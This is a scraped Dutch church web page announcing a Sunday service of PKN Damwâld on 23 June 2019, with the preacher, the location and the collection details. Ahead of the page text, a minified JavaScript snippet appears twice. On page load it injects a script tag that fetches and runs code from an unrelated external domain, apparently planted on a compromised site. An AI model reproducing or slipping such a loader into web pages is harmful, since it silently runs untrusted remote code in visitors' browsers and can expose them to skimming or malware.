;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 23 juni 2019 9:30 uur - PKN Damwâld
zondag 23 juni 2019
09:30 uur

Kerkdienst zondag 23 juni 2019 9:30 uur

Informatie

Voorganger:Ds. D.C. Hellinga, Urk
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: K.i.A. -o.v.v. collecte Werelddiaconaat Juni
Tweede collecte: Kerk
Uitganscollecte: Kerk